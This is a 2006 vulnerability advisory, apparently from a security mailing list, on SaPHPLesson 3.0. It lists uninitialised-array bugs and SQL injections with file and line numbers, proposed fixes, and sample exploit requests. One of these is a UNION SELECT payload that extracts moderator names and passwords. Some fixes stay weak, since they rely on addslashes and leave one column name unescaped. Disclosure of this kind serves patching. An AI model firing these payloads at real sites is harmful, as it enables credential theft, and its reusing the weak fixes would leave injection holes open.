SaPHPLesson 3.0 Multbugs

Fri, 05 May 2006 11:27:18 -0700 

SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:


        1- Unfilter array


        Filename        :- show.php

        Line            :- 102


[code]

$hrow[] = $Row2;[/code]


Fix :-


Add To Line [ 11 ] /show.php This Code :-


        we add the code to global to fix all unfilter ver. at the code :)


[code]

$hrow = array();[/code]


Exploit :-


        GET ^

                /lessons/show.php?lessid=1&hrow=D3vil-0x1


/---------------------------------------------------------/


        2- Unfilter array


        Filename        :- showcat.php

        Line            :- 80


[code]

$Lsnrow[] = $Row;[/code]


Fix :-


Add To Line [ 11 ] /showcat.php This Code :-


        we add the code to global to fix all unfilter ver. at the code :)


[code]

$Lsnrow = array();[/code]


Exploit :-


        GET ^


        /lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1


/---------------------------------------------------------/


        3- SQL Injection


        Filename        :- search.php

        Line            :- MultLines


Fix :-


        Line 28 Replace It With


[code]

$Sql = "select * from less,forums where less.Hidden!=1 and BINARY 
less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by 
".addslashes($Order)." ".addslashes($Trteb)."";[/code]


        Line 32 Replace It With


[code]

$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find 
REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and 
forums.id=less.forumno order by ".addslashes($Order)." 
".addslashes($Trteb)."";[/code]


        Exploit :-


        POST ^


        Word=a&Find=lesstitle UNION ALL SELECT 
null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null
 FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC


/---------------------------------------------------------/


        4- SQL Injection


        Filename        :- misc.php

        Line            :- 64


Fix :-

        Replace Line 62 & 63 With This Code


[code]

$LID  = intval($_GET["LID"]);

$Rate = intval($_POST["Rate"]);[/code]


/---------------------------------------------------------/


        5- Unfilter array


        Filename        :- index.php

        Line            :- 24


[code]

$rows[] = $Row;[/code]


Fix :-


Add To Line [ 11 ] /index.php This Code :-


        we add the code to global to fix all unfilter ver. at the code :)


[code]

$rows = array();

$hrow = array();[/code]


Exploit :-


        GET ^


        /saphplesson/index.php?rows=D3vil-x01

Reply via email to